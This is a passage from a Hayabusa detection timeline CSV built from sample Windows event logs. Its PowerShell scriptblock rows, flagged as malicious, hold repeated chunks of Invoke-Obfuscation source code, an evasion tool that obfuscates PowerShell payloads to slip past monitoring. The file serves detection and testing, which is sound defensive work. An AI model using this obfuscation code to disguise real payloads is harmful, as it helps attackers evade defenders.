operati",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with 